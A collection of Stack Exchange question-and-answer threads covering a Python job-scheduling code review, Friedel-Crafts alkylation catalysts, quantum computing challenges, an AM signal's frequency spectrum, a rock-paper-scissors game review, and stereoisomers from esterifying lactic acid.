I have created an algorithm for job scheduling. The algorithm goes through sub-lists in order with two nested for loops. Inside the nested for loops, the algorithm counts how many tasks for each job are completed. If this is equal to the number of tasks, then the profit for that job is added to the total profit.
Item start to item end is the interval during which an item uses a machine. Machine start to machine end is when a machine can process items. A single task is a single machine processing an item. The number required for a job is how many tasks must be completed, while done tasks counts the tasks that will finish in the schedule. If those two counts are equal, the job is done and its profit is added to the profit variable.
Here is the code
def output_profit(profit:int)->None:
print("profit: " + str(profit), end = "\n")
def output_subset(subset:[str])->None:
for item in subset:
print(str(item), end = " ")
def main():
items = ["a", "b"]
items_starts = [0, 3]
items_ends = [2, 4]
#total number of tasks that are needed for job i
tasks_to_complete = [1,1]
#tasks that are done for job i
done_tasks = [0, 0]
machine_starts = [0, 0]
machine_ends = [1, 7]
profits_for_job = [10, 12]
profit = 0
for row in range(0, len(items)):
for col in range(0, len(items) + 1):
subset = items[row:col]
for job_index in range(0, len(subset)):
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
profit = 0
for job_index in range(0, len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit = profit + profits_for_job[job_index]
output_profit(profit)
output_subset(subset)
if __name__ == "__main__":
main()
I am looking for ways to improve the code readability and improve the algorithm's efficiency.
Answer: Functions
It's good that you're thinking about how to capture code in functions, but you haven't particularly chosen the right code to move into functions.
This is somewhat trivial:
print("profit: " + str(profit), end = "\n")
and does not deserve its own function; simply write
print(f'profit: {profit}')
at the outer level. The same applies for output_subset, which does not need a loop and can be
print(' '.join(item for item in subset))
Instead, something that does deserve to be in a separate function is your set of loops starting at for row, which can be translated into a generator; also note that 0 is the default start for range:
ProfitPair = Tuple[
int,
List[str],
]
def get_profits( ... variables needed for iteration ...) -> Iterable[ProfitPair]:
for row in range(len(items)):
for col in range(len(items) + 1):
subset = items[row:col]
for job_index in range(len(subset)):
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
profit = 0
for job_index in range(len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit += profits_for_job[job_index]
yield (profit, subset)
Type hints
It's good that you've tried this out. subset:[str] should be subset: List[str].
Indexing
for row in range(0, len(items)):
for col in range(0, len(items) + 1):
subset = items[row:col]
seems strange to me. Based on your initialization, items is not a two-dimensional (nested) list - unless you count string indexing as the second dimension. row and col are thus somewhat misnamed, and are basically start and end.
In-place addition
done_tasks[job_index] = done_tasks[job_index] + 1
should be
done_tasks[job_index] += 1
Summation with generators
profit = 0
for job_index in range(0, len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit = profit + profits_for_job[job_index]
can be
profit = sum(
profits_for_job[job_index]
for job_index in range(len(subset))
if tasks_to_complete[job_index] == done_tasks[job_index]
)
This raises another point, though. Consider "rotating" your data structure so that, instead of multiple sequences where the same index in each correspond to a description of the same thing, e.g.
profits_for_job[job_index]
tasks_to_complete[job_index]
done_tasks[job_index]
instead have a sequence of @dataclasses with attributes:
job[job_index].profits
job[job_index].tasks_to_complete
job[job_index].tasks_done
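To make the suggested rotation concrete, here is a minimal sketch (the `Job` class name and field names are my own illustration, not from the original code):

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Job:
    profit: int
    tasks_to_complete: int
    tasks_done: int = 0


# The two jobs from the original example, rotated into one record each.
jobs: List[Job] = [
    Job(profit=10, tasks_to_complete=1, tasks_done=1),
    Job(profit=12, tasks_to_complete=1, tasks_done=0),
]

# The summation-with-generator idea now reads naturally off the records.
total = sum(job.profit for job in jobs if job.tasks_done == job.tasks_to_complete)
print(total)  # 10
```

Each index now names one coherent thing, so the parallel-list bookkeeping disappears.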
Predicate combination
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
can just be
if (
items_starts[job_index] >= machine_starts[job_index] and
items_ends[job_index] <= machine_ends[job_index]
):
done_tasks[job_index] += 1 | {
"domain": "codereview.stackexchange",
"id": 39832,
"tags": "performance, algorithm, python-3.x"
} |
Acids used in Friedel-Crafts alkylation | Question: I am learning to add alkyl groups to benzene using Friedel-Crafts alkylation:
I know that it is very common to use $\ce{AlCl3/AlBr3}$ as the Lewis acid catalyst in this reaction. But I am wondering whether I can use a Brønsted acid, e.g., $\ce{H2SO4}$, as the catalyst or not. For example, in an $\mathrm{E1}$ or hydration reaction, $\ce{H2SO4}$ is added to an alkene or alcohol, respectively, forming a carbocation, which is the same ultimate result as when $\ce{AlCl3}$ is used (making the alkyl group more electrophilic).
I am thinking $\ce{AlCl3}$ is the only way if I am adding a primary alkyl halide, since in $\mathrm{E1}$/hydration reactions an actual primary carbocation is impossible to form (too unstable), while it exists in a complex with $\ce{AlCl3}$ (not entirely a carbocation, so it can be formed).
So, what is the problem with secondary/tertiary alcohols if I use the Brønsted acid? If there is a problem, why? Both the Lewis and Brønsted acid routes will lead to carbocation rearrangements (I have not learnt the acylation yet).
Answer: Brønsted acids have been used in Friedel-Crafts alkylation before (for example, Ref. 1). According to this reference, when toluene is used as the solvent, the F-C alkylation of toluene is fruitful for tertiary and secondary alkyl bromides, tosylates, and alkenes (all of which give carbocations upon protonation). However, the only primary bromides which worked in this alkylation were benzyl and cinnamyl bromides. Other active primary bromides such as allyl and crotonyl bromides gave ditolyl products (e.g., the crotyl group substituted first, then underwent double-bond protonation followed by a hydride shift to give a secondary benzylic carbocation, which then reacted with a second toluene nucleus to give 1,1-ditolylbutane). Keep in mind that these reactions worked only with an activated phenyl nucleus. For example, chlorobenzene gave only traces of products even at higher temperatures.
Later, this reaction was successfully used in tandem Friedel-Crafts alkylation reactions to synthesize hitherto unknown perylene derivatives (Ref. 2):
References:
Mathew P. D. Mahindaratne, Kandatege Wimalasena, "Detailed Characterization of p-Toluenesulfonic Acid Monohydrate as a Convenient, Recoverable, Safe, and Selective Catalyst for Alkylation of the Aromatic Nucleus," J. Org. Chem. 1998, 63(9), 2858–2866 (https://doi.org/10.1021/jo971832r).
Mark A. Penick, Mathew P. D. Mahindaratne, Robert D. Gutierrez, Terrill D. Smith, Edward R. T. Tiekink, George R. Negrete, "Tandem Friedel–Crafts Annulation to Novel Perylene Analogues," J. Org. Chem. 2008, 73(16), 6378–6381 (https://doi.org/10.1021/jo800558c)(PDF). | {
"domain": "chemistry.stackexchange",
"id": 14313,
"tags": "organic-chemistry, reaction-mechanism, carbocation, electrophilic-substitution"
} |
Why isn't the n factor/valency factor in a disproportionation reaction = twice the number of electrons in a single half reaction? | Question: I was reading the first answer to Equivalent weight in case of disproportionation reaction there it is said
Take a disproportionation reaction:- $\ce{nA -> xB + $(n - x)$C}$ where A is being oxidised to B and the rest reduced to C. Also let $n_1$ and $n_2$ be the n-factors of A to B and C respectively
We have 2 equations: one by conservation of electrons,
$$\begin{align*}
n_1 x &= n_2(n - x) \\[7pt]
\implies x &= \frac{n_2\cdot n}{n_1 + n_2}
\end{align*}$$
and the other from the definition of $n$-factor:
$$\begin{align*}
n_f &= \frac{\text{moles of electrons transferred}}{\text{moles of reactant}} \\
&= \frac{n_1 x}{n} \\
&= \frac{n_1 n_2}{n_1 + n_2}
\end{align*}$$
In the second last line $n_f = \frac{n_1x}{n}$ shouldn't it be $\frac{n_1x+n_2(n-x)}{n}$ which is equal to $\frac{2n_1n_2}{n_1 + n_2}$ by expanding?
The reason for my thinking is that an equivalent is defined as the weight of a substance that reacts with a fixed reference amount of another substance (e.g., 1 g of hydrogen). Hydrogen can both supply and take electrons, therefore both the oxidation and reduction half-reactions of A can take place with H, and so I'm reasoning that the n-factor = the sum of the electrons for both the oxidation and reduction half-reactions.
Answer: If one insists on the formal usage of the n-factor and equivalent weight on disproportionation reactions (for which it is not intended), one must accept the fact the compound has simultaneously two n-factors (which can be incidentally equal):
one as the oxidant
one as the reductant.
Then the procedure is the same as for ordinary redox reactions where oxidants and reductants are different molecular entities.
But as Ivan and others have suggested, using n-factors for similar cases is rather useless and just complicates things. Be aware that the N-factor, equivalent, gram-equivalent and equivalent weight are obsolete concepts that should be taught only as what they are and how they were used.
The disproportionation redox reaction
$$\ce{n A -> x B + $(n - x)$C}$$
or alternatively written with small natural numbers $i,j$ as
$$\ce{$(i + j)$ A -> i B + j C}$$
is better to rewrite for easier analysis to 2 redox half-reactions:
\begin{align}
\ce{ i A &-> i B + n e-} \\
\ce{ j A + n e- &-> j C}
\end{align}
Then for n-factors of A as oxidant resp. reductant:
\begin{align}
n_\mathrm{f,A,ox} = \frac{n}{j} \tag{oxidant}\\
n_\mathrm{f,A,red} = \frac{n}{i} \tag{reductant}
\end{align}
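As a concrete illustration (my own example, not part of the original answer), take the disproportionation of chlorine in hot alkali, $\ce{3 Cl2 + 6 OH- -> 5 Cl- + ClO3- + 3 H2O}$. Counted per chlorine atom, the half-reactions are

\begin{align}
\ce{Cl^0 &-> Cl^{+V} + 5 e-} \tag{$i = 1,\ n = 5$}\\
\ce{5 Cl^0 + 5 e- &-> 5 Cl-} \tag{$j = 5,\ n = 5$}
\end{align}

so $n_\mathrm{f,ox} = n/j = 1$ and $n_\mathrm{f,red} = n/i = 5$. This also reproduces the combined formula quoted in the question: with $n_1 = 5$ and $n_2 = 1$, $n_1 n_2/(n_1 + n_2) = 5/6$, i.e. 5 electrons are transferred per 6 chlorine atoms.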
It could be better understood if we reverse the reaction:
$$\ce{i B + j C -> $(i + j)$ A }$$ | {
"domain": "chemistry.stackexchange",
"id": 17636,
"tags": "redox"
} |
rock paper scissors game simplify in Python | Question: I wrote a rock paper scissors game using what I have learnt so far. That is only while and for statements, lists, tuples, dictionaries and other simple things. So I am interested in how I can simplify this code using only what I have learnt (simple things).
Here is the code
k = input("Hello guys what are you names: ")
j = input("and yours? ")
print(f"""ok {k} and {j} let the game begin!"
P.s. Type exit to quit game""")
list = ["rock","paper","scissors"]
while True:
a_player = input(f"{k} choose: rock, scissors, paper : ").lower()
if a_player == "exit":
break
b_player = input(f"{j} choose: rock, scissors, paper: ").lower()
if b_player == "exit":
break
for type in list:
if a_player == type and b_player==type:
print(" Draw guys, draw")
break
if b_player != list[1] and b_player!=list[0] and b_player!=list[2] or (a_player != list[1] and a_player != list[0] and a_player != list[2]) :
print("Please type correctly")
if a_player == list[1]:
if b_player == list[0]:
print(f" {k} wins: paper beats rock")
elif b_player ==list[2] :
print(f"{j} wins: scissors beat paper")
elif a_player == list[2]:
if b_player == list[0]:
print(f"{j} wins: rock beats scissors")
elif b_player == list[1]:
print(f"{k} wins: scissors beat paper")
elif a_player == list[0]:
if b_player == list[2]:
print(f"{k} wins: rock beats scissors")
elif b_player==list[1]:
print(f"{j} wins: paper beats rock")
Answer: I'm new to this community, but I'll give this my best shot:
Avoid single letter variable names. Names like k and j convey little about what values they represent, so replace them with something like:
a_player_name = input("Hello guys what are you names: ")
b_player_name = input("and yours? ")
This code:
a_player = input(f"{k} choose: rock, scissors, paper : ").lower()
creates the need to catch errors down the line and is repeated so I recommend replacing it with:
def input_choices(string):
while True:
choice = input(string)
if choice.lower() in list:
return choice
else:
print('Please type correctly')
a_player = input_choices(f"{k} choose: rock, scissors, paper : ")
This avoids the need for:
if b_player != list[1] and b_player!=list[0] and b_player!=list[2] or (a_player != list[1] and a_player != list[0] and a_player != list[2]) :
print("Please type correctly")
Which I hope you agree is a vast improvement. Remember you can always format conditionals like this to improve readability:
if (
b_player != list[0] and b_player != list[1] and b_player != list[2]
or a_player != list[1] and a_player != list[0] and a_player != list[2]
):
print("Please type correctly")
Or even better use the in keyword
if (
a_player not in list
or b_player not in list
):
print("Please type correctly")
As for the actual rock-paper-scissors logic:
if a_player == list[1]:
if b_player == list[0]:
print(f" {k} wins: paper beats rock")
elif b_player ==list[2] :
print(f"{j} wins: scissors beat paper")
elif a_player == list[2]:
if b_player == list[0]:
print(f"{j} wins: rock beats scissors")
elif b_player == list[1]:
print(f"{k} wins: scissors beat paper")
elif a_player == list[0]:
if b_player == list[2]:
print(f"{k} wins: rock beats scissors")
elif b_player==list[1]:
print(f"{j} wins: paper beats rock")
I'm sure this can be improved with table-driven logic; there's no end of examples for you to skim through in the 'Related' tab.
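To hint at what table-driven logic could look like, here is a small sketch of my own (not wired into the game loop above): a dict maps each choice to the choice it beats, which replaces all nine branches.

```python
# Each key beats its value.
beats = {"rock": "scissors", "paper": "rock", "scissors": "paper"}


def decide(a_choice, b_choice):
    """Return 'draw', 'a' or 'b' depending on who wins."""
    if a_choice == b_choice:
        return "draw"
    return "a" if beats[a_choice] == b_choice else "b"


print(decide("rock", "scissors"))  # a
print(decide("paper", "scissors"))  # b
print(decide("rock", "rock"))      # draw
```

The win messages then collapse into a single f-string along the lines of `f"{name} wins: {choice} beats {beats[choice]}"`.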
Hope that helped :) | {
"domain": "codereview.stackexchange",
"id": 38327,
"tags": "python"
} |
what breakthrough Physics needs to make quantum computers work? | Question: I read some posts on this forum and some articles which repeatedly state that it is not impossible to build quantum computers, but that to make them successful, physics needs a great breakthrough.
I tried searching, but most of the material talks about how they work and what the current limitations are, not about how physics is going to help solve them.
Can somebody please explain precisely 'what is that breakthrough?'.
Answer: It can be argued that there are two primary challenges associated with quantum computing. One is a coding challenge, and the other is a purely mechanical (or in some minds physical) challenge.
As Ron indicated, viable Quantum Error Correction Code (QECC) is probably the largest breakthrough that makes quantum computers possible. Peter Shor was the first to demonstrate a viable Quantum Error Correction Code that can also be characterized as a Decoherence Free Subspace.
At this point, it can be argued that most of the problems associated with Fault Tolerant Quantum Computing are resolvable in terms of theory. However, there is a question of scaling as it relates to the number of qubits that are required to make the system viable, and the physical size of the system that is required to support those qubits. Most arguments that say there is a needed breakthrough in physics can be traced to this question of scalability.
In many cases, the difficulties are related to decoherence times and the speed at which the computers can perform calculations, which would allow the QECC time to operate. At this point those are now considered largely engineering challenges.
As far as physical breakthroughs, it is likely that those conversations are in regards to Topological Quantum Computers, which rely upon the construction of Anyons in order to operate. Currently these are largely viewed as pure mathematical constructions, however, the construction and use of stable anyons, even as quasiparticles, as part of topological quantum computer would be a major physical breakthrough. | {
"domain": "physics.stackexchange",
"id": 4735,
"tags": "quantum-mechanics, quantum-computer"
} |
nav2: changing controller plugins manually during runtime | Question:
I have created a controller plugin by following the tutorial and it is working as expected. I now have two controller plugins (The DWB controller present by default and the controller plugin I created) which are loaded at runtime and I can use those plugins in my behaviour tree as per my requirements.
My question is:
Is there a way in which I can I change the controller plugin during runtime manually if the need arises? If yes then How?
I am using Ubuntu 20.04 with ROS2 Foxy
Thanks for the help in advance
Originally posted by Divyanshu on ROS Answers with karma: 15 on 2020-11-25
Post score: 0
Answer:
In Nav2, you can have N different plugins in the controller server, rather than just 1. So you can load both of your plugins to use in the controller server and have them individually callable by their "name" namespace using the BT nodes for follow path. There's a controller_id field that defaults to the default ID we assign in the controller server, but that can be set to a different value in the section of the behavior tree that requires another controller.
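For illustration, a behavior tree fragment that selects a specific controller might look roughly like this (a sketch only; "MyCustomController" is a hypothetical name and must match one of the IDs configured in the controller server's `controller_plugins` parameter):

```xml
<!-- Sketch: controller_id selects which loaded controller plugin handles this path.
     The ID below is hypothetical; use a name from your controller server config. -->
<FollowPath path="{path}" controller_id="MyCustomController"/>
```

Switching controllers at runtime then amounts to routing execution through different branches of the behavior tree, each with its own `controller_id`.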
Originally posted by stevemacenski with karma: 8272 on 2020-11-25
This answer was ACCEPTED on the original site
Post score: 1
Original comments
Comment by prince on 2020-12-17:
Is there any tutorial or sample package from which one can learn? Specifically for beginners of Nav2. | {
"domain": "robotics.stackexchange",
"id": 35798,
"tags": "microcontroller, plugin"
} |
How to sketch a frequency spectrum for an AM signal? | Question: So I have an AM signal, given by:
$$v(t)=50\cos(\pi 10^{6} t )+ 20\sin(\pi 10^3t)\cos(\pi 10^6 t)$$
I was asked to sketch the spectrum of the signal obtained, so I found the fourier transform of it, and that's what I got,
$$V(f)=25 \left[ \delta(f - 500k)+ \delta(f+500k)\right]+5i\left[\delta(f-499.5k)-\delta(f+499.5k) \right]-5i\left[\delta(f-500.5k)-\delta(f+500.5k) \right]$$
And so far I only knew how to sketch the first term, as shown below,
But I don't know how to sketch the imaginary terms.
Answer: Since a signal's spectrum is complex, it can't be drawn in a single two-dimensional plot. What is usually done is to do two plots; one is the magnitude spectrum and the other is the phase spectrum.
When looking at signals, most of the time, the magnitude spectrum contains all the information that is needed and the phase spectrum is ignored. When looking at filters, the phase spectrum is important because one usually wants the phase response to be linear in the filter's passband.
So, what you need is the magnitude of $V(f)$:
$$|V(f)| = 25 \left[ \delta(f - 500k)+ \delta(f+500k)\right] + 5\left[\delta(f-499.5k) + \delta(f+499.5k) \right] + 5\left[\delta(f-500.5k)+\delta(f+500.5k) \right].$$
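As a quick numerical cross-check of where the spectral lines of this $v(t)$ fall, here is a stdlib-only sketch of mine (the 4 MHz sample rate and 2 ms window are assumptions chosen so that every tone lands exactly on a DFT bin):

```python
import cmath
import math

fs = 4_000_000   # sample rate in Hz (assumed), 8x the 500 kHz carrier
N = 8_000        # 2 ms window -> 500 Hz bin spacing, all tones on-bin

# v(t) = 50 cos(pi 10^6 t) + 20 sin(pi 10^3 t) cos(pi 10^6 t), sampled at t = n/fs
v = [50 * math.cos(math.pi * 1e6 * n / fs)
     + 20 * math.sin(math.pi * 1e3 * n / fs) * math.cos(math.pi * 1e6 * n / fs)
     for n in range(N)]


def line_magnitude(f):
    """Normalized single-frequency DFT probe: returns A/2 for an on-bin tone of amplitude A."""
    return abs(sum(x * cmath.exp(-2j * math.pi * f * n / fs)
                   for n, x in enumerate(v))) / N


for f in (500_000, 499_500, 500_500):
    print(f, round(line_magnitude(f), 3))  # 25.0 at the carrier, 5.0 at each sideband
```

Each probe returns half the corresponding tone's amplitude: 25 for the 50-amplitude carrier and 5 for each 10-amplitude sideband, which are the weights to draw on the delta functions.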
The magnitude spectrum is real, so it can be drawn in a regular 2-D plot. Note that all values of the magnitude spectrum are positive. | {
"domain": "dsp.stackexchange",
"id": 7050,
"tags": "digital-communications"
} |
How do I determine stereochemistry of the product | Question: When pure (L)-lactic acid is esterified by racemic 2-butanol, what is the nature of the stereoisomers so obtained, i.e. are they diastereomers or enantiomers?
I studied the mechanism of esterification but I didn't find anything regarding the stereoisomerism that can affect the formation of the product. Any ideas? Thanks.
Answer: The reaction doesn't change the stereo configuration for either reactant, so we can assume that the product is enantiomerically pure with respect to the carbon attached to the hydroxyl group (in orange below), and a racemic mixture with respect to the tertiary carbon (in blue).
Since there are multiple stereocenters, you can either have both the same (same molecule), both different (enantiomers), or have some different and some the same (diastereomer). The products would be diastereomers. In particular they would be epimers, which differ in only one stereocenter. | {
"domain": "chemistry.stackexchange",
"id": 7003,
"tags": "reaction-mechanism, stereochemistry"
} |